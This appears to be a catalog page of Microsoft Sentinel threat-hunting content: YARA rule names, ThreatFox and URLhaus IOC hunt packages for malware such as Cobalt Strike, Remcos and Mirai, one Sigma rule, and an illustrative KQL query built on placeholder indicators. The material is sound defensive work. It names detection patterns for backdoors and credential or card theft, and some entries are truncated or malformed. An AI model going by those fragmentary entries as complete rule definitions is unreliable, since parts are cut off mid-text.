Detection rules, YARA signatures, and KQL queries for threat hunting in Microsoft Sentinel (formerly Azure Sentinel).

Each entry below gives, where the catalog records them: the rule or hunt-package title; Type and Severity; Source (Yara-Rules, ThreatFox, URLhaus or SigmaHQ); Tactic (recorded only for the Sigma rule, as an ATT&CK technique ID); for IOC hunt packages, the Sentinel tables the package is matched against (CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents, DnsEvents, UrlClickEvents); a description; and Tags. Entries with no title or severity line are listed exactly as the catalog shows them.
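The IOC hunt packages in this catalog are all matched against the same handful of Sentinel tables. The query below is an added example of that hunt shape, written here for illustration; it is not a query shipped by ThreatFox, URLhaus or any of the listed packages. The indicator values are constructed placeholders (RFC 5737 addresses, example.net/example.org names and an all-zero hash) standing in for a package's real IOCs, and the column names are the standard Sentinel schema for the five tables the catalog names.

```kql
// Added example of an IOC hunt package's query shape; not code from ThreatFox, URLhaus or the rules repositories.
// All indicators below are constructed placeholders, not real IOCs: substitute a package's values.
let lookback = 30d;
let ioc_ips = dynamic(["192.0.2.10", "198.51.100.7"]);            // ip:port IOCs reduced to the IP
let ioc_domains = dynamic(["c2.example.net", "cdn.example.org"]); // domain and URL IOCs (host part)
let ioc_sha256 = dynamic(["0000000000000000000000000000000000000000000000000000000000000000"]);
// Firewall / proxy CEF records: destination IP, destination host name, or requested URL
let hits_cef = CommonSecurityLog
    | where TimeGenerated > ago(lookback)
    | where DestinationIP in (ioc_ips)
        or DestinationHostName has_any (ioc_domains)
        or RequestURL has_any (ioc_domains)
    | project TimeGenerated, Table = "CommonSecurityLog", Host = Computer,
              Indicator = iff(isempty(DestinationHostName), DestinationIP, DestinationHostName),
              Context = strcat(DeviceVendor, " ", DeviceProduct);
// Endpoint network telemetry: remote IP or URL, keyed to the process that made the connection
let hits_net = DeviceNetworkEvents
    | where TimeGenerated > ago(lookback)
    | where RemoteIP in (ioc_ips) or RemoteUrl has_any (ioc_domains)
    | project TimeGenerated, Table = "DeviceNetworkEvents", Host = DeviceName,
              Indicator = iff(isempty(RemoteUrl), RemoteIP, RemoteUrl),
              Context = InitiatingProcessFileName;
// DNS resolutions: queried name, or an indicator IP appearing in the answer (IPAddresses is a comma-separated string)
let hits_dns = DnsEvents
    | where TimeGenerated > ago(lookback)
    | where Name has_any (ioc_domains) or IPAddresses has_any (ioc_ips)
    | project TimeGenerated, Table = "DnsEvents", Host = Computer, Indicator = Name, Context = ClientIP;
// Safe Links clicks: the user is the most useful "host" here
let hits_click = UrlClickEvents
    | where TimeGenerated > ago(lookback)
    | where Url has_any (ioc_domains)
    | project TimeGenerated, Table = "UrlClickEvents", Host = AccountUpn, Indicator = Url, Context = ActionType;
// File hash indicators from endpoint file telemetry
let hits_file = DeviceFileEvents
    | where TimeGenerated > ago(lookback)
    | where SHA256 in (ioc_sha256)
    | project TimeGenerated, Table = "DeviceFileEvents", Host = DeviceName, Indicator = SHA256, Context = FolderPath;
// isfuzzy=true keeps the hunt running in a workspace that lacks one of the tables
union isfuzzy=true hits_cef, hits_net, hits_dns, hits_click, hits_file
| summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated),
            Hits = count(), Tables = make_set(Table) by Host, Indicator
| order by LastSeen desc
```

Two practical caveats: ThreatFox `ip:port` indicators are reduced to the IP here, so a hit on a shared hosting address needs the port and the process context (`Context`) before it is worth escalating; and if the same query is run from Defender XDR advanced hunting rather than Sentinel, the device tables expose `Timestamp` instead of `TimeGenerated`.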
Source: Yara-Rules
YARA rule: callTogether_certificate
Tags: community

Source: Yara-Rules
Detects a file cloaked as a JPG
Tags: community

DownExecute A
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: DownExecute_A
Tags: community

Source: Yara-Rules
YARA rule: EmiratesStatement
Tags: backdoor, community

OrcaRAT
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: OrcaRAT
Tags: backdoor, community

Pandora
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: Pandora
Tags: community

Source: Yara-Rules
Qadars - mobile part. Maybe Perkele.
Tags: community

qti certificate
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: qti_certificate
Tags: community

SpyGate v2 9
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: SpyGate_v2_9
Tags: community
ThreatFox: RedTail IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 8 IOCs associated with RedTail
Tags: elf-redtail, ioc, threatfox

ThreatFox: XMRIG IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 6 IOCs associated with XMRIG
Tags: elf-xmrig, ioc, threatfox

Source: ThreatFox
Tables: DnsEvents
Hunt package for 5 IOCs associated with ClearFake
Tags: ioc, js-clearfake, threatfox

Source: ThreatFox
Tables: DnsEvents
The IClick
Tags: ioc, js-iclickfix, threatfox

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 4 IOCs associated with Unknown malware
Tags: ioc, threatfox, unknown

Source: ThreatFox
Tables: DnsEvents
Hunt package for 3 IOCs associated with Unknown Stealer
Tags: infostealer, ioc, threatfox, unknown_stealer

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 3 IOCs associated with Cobalt Strike
Tags: cobalt-strike, ioc, threatfox, win-cobalt_strike

ThreatFox: Remcos IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents
Hunt package for 2 IOCs associated with Remcos
Tags: ioc, threatfox, win-remcos

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 39 malicious URLs tagged as 32-bit
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 8 malicious URLs tagged as ClearFake
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 43 malicious URLs tagged as elf
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 3 malicious URLs tagged as malware_download
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for malicious URLs tagged as Mirai. Mirai is an IoT botnet family that spreads by scanning for devices exposing Telnet/SSH and logging in with factory-default credentials; infected devices are enrolled in large-scale DDoS attacks. The URLs in this package are the payload-download locations those infected devices fetch the bot binary from, not phishing lures.
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 4 malicious URLs tagged as Mozi
Tags: ioc, urlhaus
ZXProxy
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: ZXProxy
Tags: community

Source: Yara-Rules
YARA rule: malicious_LNK_files
Tags: community

memory pivy
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: memory_pivy
Tags: community

memory shylock
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: memory_shylock
Tags: community

misc iocs
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: misc_iocs
Tags: community

Source: Yara-Rules
ScanBox, Chinese Deep Panda APT malware (see http://goo.gl/MUUfjv and http://goo.gl/WXUQcP)
Tags: apt, community
ThreatFox: Aisuru IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 2 IOCs associated with Aisuru
Tags: elf-aisuru, ioc, threatfox

ThreatFox: Mirai IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents, DnsEvents, UrlClickEvents
Hunt package for 17 IOCs associated with Mirai
Tags: elf-mirai, ioc, threatfox

ThreatFox: Mozi IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: UrlClickEvents
Hunt package for 16 IOCs associated with Mozi
Tags: elf-mozi, ioc, threatfox

Source: ThreatFox
Tables: DnsEvents, UrlClickEvents
Hunt package for 19 IOCs associated with ClearFake
Tags: ioc, js-clearfake, threatfox

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents
Hunt package for 21 IOCs associated with Unknown malware
Tags: ioc, threatfox, unknown

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 13 IOCs associated with Unknown RAT
Tags: backdoor, ioc, threatfox, unknown_rat

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 4 IOCs associated with AdaptixC2
Tags: apt, ioc, threatfox, win-adaptix_c2

Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 3 IOCs associated with Agent Tesla
Tags: ioc, threatfox, win-agent_tesla

ThreatFox: AsyncRAT IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 10 IOCs associated with AsyncRAT
Tags: backdoor, ioc, threatfox, win-asyncrat

ThreatFox: BianLian IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 2 IOCs associated with BianLian
Tags: ioc, threatfox, win-bianlian

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents
Hunt package for 7 IOCs associated with Cobalt Strike
Tags: cobalt-strike, ioc, threatfox, win-cobalt_strike

ThreatFox: DCRat IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 2 IOCs associated with DCRat
Tags: backdoor, ioc, threatfox, win-dcrat

ThreatFox: Formbook IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 3 IOCs associated with Formbook
Tags: ioc, threatfox, win-formbook

ThreatFox: PureRAT IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 4 IOCs associated with PureRAT
Tags: backdoor, ioc, threatfox, win-pure_rat

ThreatFox: Remcos IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 16 IOCs associated with Remcos
Tags: ioc, threatfox, win-remcos

ThreatFox: Sliver IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 2 IOCs associated with Sliver
Tags: ioc, threatfox, win-sliver

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 2 IOCs associated with SnappyClient
Tags: ioc, threatfox, win-snappy_client

ThreatFox: Stealc IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 15 IOCs associated with Stealc
Tags: ioc, threatfox, win-stealc

ThreatFox: Vidar IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DnsEvents, UrlClickEvents
Hunt package for 14 IOCs associated with Vidar
Tags: ioc, threatfox, win-vidar

ThreatFox: VShell IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 3 IOCs associated with VShell
Tags: ioc, threatfox, win-vshell
tran duy linh
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: tran_duy_linh
Tags: community

Source: Yara-Rules
Trojan Downloader - Flash Exploit Feb15
Tags: backdoor, community, exploit

Source: Yara-Rules
YARA rule: eval_with_comments
Tags: community

fopo obfuscator
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: fopo_obfuscator
Tags: community

Source: Yara-Rules
YARA rule: fromCharCode_in_unicode
Tags: community

Source: Yara-Rules
YARA rule: function_through_object
Tags: community

hex script
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: hex_script
Tags: community

html upload
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: html_upload
Tags: community

Source: Yara-Rules
YARA rule: md5_cdn_js_link_js
Tags: community

Source: Yara-Rules
YARA rule: obf_base64_decode
Tags: community

php malfunctions
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: php_malfunctions
Tags: community

Source: Yara-Rules
YARA rule: php_obf_malfunctions
Tags: community

php uname
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: php_uname
Tags: community

Source: Yara-Rules
YARA rule: PM_Email_Sent_By_PHP_Script
Tags: community

PM Zip with js
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: PM_Zip_with_js
Tags: community

scriptkiddies
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: scriptkiddies
Tags: community

thetech org js
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: thetech_org_js
Tags: community
ThreatFox: RedTail IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 5 IOCs associated with RedTail
Tags: elf-redtail, ioc, threatfox

ThreatFox: XMRIG IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 5 IOCs associated with XMRIG
Tags: elf-xmrig, ioc, threatfox

Source: ThreatFox
Tables: DnsEvents
Hunt package for 5 IOCs associated with ClearFake
Tags: ioc, js-clearfake, threatfox

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents
Hunt package for 83 IOCs associated with Unknown malware
Tags: ioc, threatfox, unknown

ThreatFox: 4h_rat IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DnsEvents
Hunt package for 4 IOCs associated with 4h_rat
Tags: backdoor, ioc, threatfox, win-4h_rat

ThreatFox: AsyncRAT IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 7 IOCs associated with AsyncRAT
Tags: backdoor, ioc, threatfox, win-asyncrat

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents
Hunt package for 7 IOCs associated with Cobalt Strike
Tags: cobalt-strike, ioc, threatfox, win-cobalt_strike

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 2 IOCs associated with Nanocore RAT
Tags: backdoor, ioc, threatfox, win-nanocore

ThreatFox: Remcos IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents
Hunt package for 13 IOCs associated with Remcos
Tags: ioc, threatfox, win-remcos

ThreatFox: Tofsee IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 17 IOCs associated with Tofsee
Tags: ioc, threatfox, win-tofsee

ThreatFox: Vidar IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents
Hunt package for 48 IOCs associated with Vidar
Tags: ioc, threatfox, win-vidar
Source: Yara-Rules
YARA rule: Trojan_W32_Gh0stMiancha_1_0_0
Tags: backdoor, community

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 20 malicious URLs tagged as 32-bit
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 2 malicious URLs tagged as 94-183-232-247
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 2 malicious URLs tagged as botnet
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 4 malicious URLs tagged as ClearFake
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 58 malicious URLs tagged as elf
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 7 malicious URLs tagged as malware_download
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 4 malicious URLs tagged as Mozi
Tags: ioc, urlhaus

amasty biz
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: amasty_biz
Tags: community

amasty biz js
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: amasty_biz_js
Tags: community

atob js
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: atob_js
Tags: community

cloudfusion me
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: cloudfusion_me
Tags: community

Source: Yara-Rules
YARA rule: credit_card_regex
Tags: community

gate php js
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: gate_php_js
Tags: community

googieplay js
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: googieplay_js
Tags: community

grelos v
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: grelos_v
Tags: community

hacked domains
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: hacked_domains
Tags: community

ip 5uu8 com
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: ip_5uu8_com
Tags: community

jquery code su
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: jquery_code_su
Tags: community

Source: Yara-Rules
YARA rule: jquery_code_su_multi
Tags: community

mag php js
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: mag_php_js
Tags: community

mage cdn link
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: mage_cdn_link
Tags: community

Source: Yara-Rules
YARA rule: md5_4aa900ddd4f1848a15c61a9b7acd5035
Tags: community

Source: Yara-Rules
YARA rule: md5_f797dd5d8e13fe5c8898dbe3beb3cc5b
Tags: community

Source: Yara-Rules
YARA rule: onepage_or_checkout
Tags: community

returntosender
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: returntosender
Tags: community

Source: Yara-Rules
YARA rule: sinlesspleasure_com
Tags: community
ThreatFox: Mirai IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents
Hunt package for 7 IOCs associated with Mirai
Tags: elf-mirai, ioc, threatfox

ThreatFox: Mozi IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: UrlClickEvents
Hunt package for 7 IOCs associated with Mozi
Tags: elf-mozi, ioc, threatfox

ThreatFox: RedTail IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 2 IOCs associated with RedTail
Tags: elf-redtail, ioc, threatfox

ThreatFox: Tsunami IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 2 IOCs associated with Tsunami
Tags: elf-tsunami, ioc, threatfox

ThreatFox: XMRIG IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 3 IOCs associated with XMRIG
Tags: elf-xmrig, ioc, threatfox

Source: ThreatFox
Tables: CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents, UrlClickEvents
Hunt package for 9 IOCs associated with BeaverTail
Tags: ioc, js-beavertail, threatfox

Source: ThreatFox
Tables: DnsEvents
Hunt package for 8 IOCs associated with ClearFake
Tags: ioc, js-clearfake, threatfox

ThreatFox: KongTuke IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: UrlClickEvents
Hunt package for 2 IOCs associated with KongTuke
Tags: ioc, js-kongtuke, threatfox

ThreatFox: Xloader IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 6 IOCs associated with Xloader
Tags: ioc, osx-xloader, threatfox

Source: ThreatFox
Tables: DnsEvents, UrlClickEvents
Hunt package for 2 IOCs associated with Unknown malware
Tags: ioc, threatfox, unknown

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 5 IOCs associated with AdaptixC2
Tags: apt, ioc, threatfox, win-adaptix_c2

ThreatFox: AsyncRAT IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 9 IOCs associated with AsyncRAT
Tags: backdoor, ioc, threatfox, win-asyncrat

Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 6 IOCs associated with BlackShades
Tags: ioc, threatfox, win-blackshades

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 5 IOCs associated with Cobalt Strike
Tags: cobalt-strike, ioc, threatfox, win-cobalt_strike

Source: ThreatFox
Tables: CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents
Hunt package for 6 IOCs associated with Meterpreter
Tags: ioc, threatfox, win-meterpreter

Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 42 IOCs associated with NetWire RC
Tags: ioc, threatfox, win-netwire

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, UrlClickEvents
Hunt package for 7 IOCs associated with RapidStealer
Tags: infostealer, ioc, threatfox, win-rapid_stealer

ThreatFox: Remcos IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents
Hunt package for 5 IOCs associated with Remcos
Tags: ioc, threatfox, win-remcos

ThreatFox: Vidar IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 9 IOCs associated with Vidar
Tags: ioc, threatfox, win-vidar

ThreatFox: VShell IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 6 IOCs associated with VShell
Tags: ioc, threatfox, win-vshell
Source: Yara-Rules
YARA rule: Trafficanalyzer_js
Tags: community

Source: Yara-Rules
YARA rule: base64_hidden_in_image
Tags: community

Source: Yara-Rules
YARA rule: eval_base64_decode_a
Tags: community

Source: Yara-Rules
YARA rule: fake_magentoupdate_site
Tags: community

Source: Yara-Rules
YARA rule: hidden_file_upload_in_503
Tags: community

Source: Yara-Rules
YARA rule: hide_data_in_jpeg
Tags: community

Source: Yara-Rules
YARA rule: indoexploit_autoexploiter
Tags: community, exploit

Source: Yara-Rules
YARA rule: ld_preload_backdoor
Tags: backdoor, community

Source: Yara-Rules
YARA rule: md5_0105d05660329704bdb0ecd3fd3a473b
Tags: community

Source: Yara-Rules
YARA rule: md5_023a80d10d10d911989e115b477e42b5
Tags: community

Source: Yara-Rules
YARA rule: md5_06e3ed58854daeacf1ed82c56a883b04
Tags: community

Source: Yara-Rules
YARA rule: md5_0b1bfb0bdc7e017baccd05c6af6943ea
Tags: community

Source: Yara-Rules
YARA rule: md5_2495b460f28f45b40d92da406be15627
Tags: community

Source: Yara-Rules
YARA rule: md5_24f2df1b9d49cfb02d8954b08dba471f
Tags: community

Source: Yara-Rules
YARA rule: md5_28690a72362e021f65bb74eecc54255e
Tags: community

Source: Yara-Rules
YARA rule: md5_2c37d90dd2c9c743c273cb955dd83ef6
Tags: community

Source: Yara-Rules
YARA rule: md5_39ca2651740c2cef91eb82161575348b
Tags: community

Source: Yara-Rules
YARA rule: md5_3ccdd51fe616c08daafd601589182d38
Tags: community

Source: Yara-Rules
YARA rule: md5_4adef02197f50b9cc6918aa06132b2f6
Tags: community

Source: Yara-Rules
YARA rule: md5_4b69af81b89ba444204680d506a8e0a1
Tags: community

Source: Yara-Rules
YARA rule: md5_4c4b3d4ba5bce7191a5138efa2468679
Tags: community

Source: Yara-Rules
YARA rule: md5_50be694a82a8653fa8b31d049aac721a
Tags: community

Source: Yara-Rules
YARA rule: md5_6eb201737a6ef3c4880ae0b8983398a9
Tags: community

Source: Yara-Rules
YARA rule: md5_71a7c769e644d8cf3cf32419239212c7
Tags: community

Source: Yara-Rules
YARA rule: md5_825a3b2a6abbe6abcdeda64a73416b3d
Tags: community

Source: Yara-Rules
YARA rule: md5_87cf8209494eedd936b28ff620e28780
Tags: community

Source: Yara-Rules
YARA rule: md5_8e5f7f6523891a5dcefcbb1a79e5bbe9
Tags: community

Source: Yara-Rules
YARA rule: md5_9b59cb5b557e46e1487ef891cedaccf7
Tags: community

Source: Yara-Rules
YARA rule: md5_ab63230ee24a988a4a9245c2456e4874
Tags: community

Source: Yara-Rules
YARA rule: md5_b3ee7ea209d2ff0d920dfb870bad8ce5
Tags: community

Source: Yara-Rules
YARA rule: md5_b579bff90970ec58862ea8c26014d643
Tags: community

Source: Yara-Rules
YARA rule: md5_c647e85ad77fd9971ba709a08566935d
Tags: community

Source: Yara-Rules
YARA rule: md5_d201d61510f7889f1a47257d52b15fa2
Tags: community

Source: Yara-Rules
YARA rule: md5_d30b23d1224438518d18e90c218d7c8b
Tags: community

Source: Yara-Rules
YARA rule: md5_e03b5df1fa070675da8b6340ff4a67c2
Tags: community

Source: Yara-Rules
YARA rule: md5_fb9e35bf367a106d18eb6aa0fe406437
Tags: community

Source: Yara-Rules
YARA rule: md5_fd141197c89d27b30821f3de8627ac38
Tags: community

obfuscated eval
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: obfuscated_eval
Tags: community

Source: Yara-Rules
YARA rule: obfuscated_globals
Tags: community

Source: Yara-Rules
YARA rule: overwrite_globals_hack
Tags: community
Source: SigmaHQ
Tactic: T1027.011 (ATT&CK technique ID)
imProcessCreate
Detects the execution of a binary from the Linux shared memory directory /dev/shm. This directory is a tmpfs mount backed entirely by RAM and is abused by attackers for fileless malware staging becaus
ThreatFox: Mirai IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 3 IOCs associated with Mirai
Tags: elf-mirai, ioc, threatfox

ThreatFox: Mozi IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: UrlClickEvents
Hunt package for 10 IOCs associated with Mozi
Tags: elf-mozi, ioc, threatfox

ThreatFox: RedTail IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 5 IOCs associated with RedTail
Tags: elf-redtail, ioc, threatfox

ThreatFox: XMRIG IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents
Hunt package for 10 IOCs associated with XMRIG
Tags: elf-xmrig, ioc, threatfox

Source: ThreatFox
Tables: DnsEvents, UrlClickEvents
Hunt package for 23 IOCs associated with ClearFake
Tags: ioc, js-clearfake, threatfox

ThreatFox: KongTuke IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DnsEvents, UrlClickEvents
Hunt package for 2 IOCs associated with KongTuke
Tags: ioc, js-kongtuke, threatfox

Source: ThreatFox
Tables: DnsEvents, UrlClickEvents
Hunt package for 8 IOCs associated with SmartApeSG
Tags: ioc, js-smartapesg, threatfox

Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 3 IOCs associated with Venus Stealer
Tags: infostealer, ioc, py-venus_stealer, threatfox

Source: ThreatFox
Tables: CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents, DnsEvents, UrlClickEvents
Hunt package for 17 IOCs associated with Unknown malware
Tags: ioc, threatfox, unknown

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 4 IOCs associated with AdaptixC2
Tags: apt, ioc, threatfox, win-adaptix_c2

ThreatFox: AsyncRAT IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents
Hunt package for 14 IOCs associated with AsyncRAT
Tags: backdoor, ioc, threatfox, win-asyncrat

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents
Hunt package for 31 IOCs associated with Cobalt Strike
Tags: cobalt-strike, ioc, threatfox, win-cobalt_strike

ThreatFox: DCRat IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 2 IOCs associated with DCRat
Tags: backdoor, ioc, threatfox, win-dcrat

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 2 IOCs associated with Eye Pyramid
Tags: ioc, threatfox, win-eye_pyramid

Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 18 IOCs associated with Nanocore RAT
Tags: backdoor, ioc, threatfox, win-nanocore

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents
Hunt package for 12 IOCs associated with NetSupportManager RAT
Tags: backdoor, ioc, threatfox, win-netsupportmanager_rat

ThreatFox: Remcos IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 7 IOCs associated with Remcos
Tags: ioc, threatfox, win-remcos

ThreatFox: Remus IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DnsEvents, UrlClickEvents
Hunt package for 3 IOCs associated with Remus
Tags: ioc, threatfox, win-remus

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, UrlClickEvents
Hunt package for 5 IOCs associated with ValleyRAT
Tags: backdoor, ioc, threatfox, win-valley_rat

ThreatFox: Vidar IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DnsEvents, UrlClickEvents
Hunt package for 2 IOCs associated with Vidar
Tags: ioc, threatfox, win-vidar

ThreatFox: VShell IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 9 IOCs associated with VShell
Tags: ioc, threatfox, win-vshell

Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 12 IOCs associated with WannaCryptor
Tags: ioc, threatfox, win-wannacryptor

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 14 malicious URLs tagged as 178-236-246-159
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
